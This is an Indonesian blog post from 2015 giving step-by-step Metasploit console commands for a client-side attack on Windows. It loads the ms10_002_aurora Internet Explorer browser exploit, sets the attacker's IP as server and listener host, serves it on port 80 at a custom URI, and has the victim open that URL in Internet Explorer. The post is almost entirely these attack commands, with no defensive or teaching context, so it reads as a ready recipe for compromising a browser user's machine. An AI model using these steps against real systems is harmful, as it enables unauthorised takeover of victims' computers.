Kamis, 27 Agustus 2015

Steps of Client Side Attack

1. Buka terminal pada Kali linux
2. Ketik #msfconsole
3. > use exploit/windows/browser/ (tab 2x )
4. Ketik Y ( yes )
5.>use exploit/windows/browser/ms10_002_aurora enter
6.>show options

7.>set SRVHOST 192.168.1.107 ( ip wlan0/attacker )
8.>set SRVPORT 80
9.>set URIPATH siantarman
9.>set LHOST 192.168.1.107 ( ip wlan0/attacker )
10.>show options
11.>exploit enter
12.>ketik alamat URL: http://192.168.1.107:80/siantarman
        browse di windows enternet explorer


Tidak ada komentar:

Posting Komentar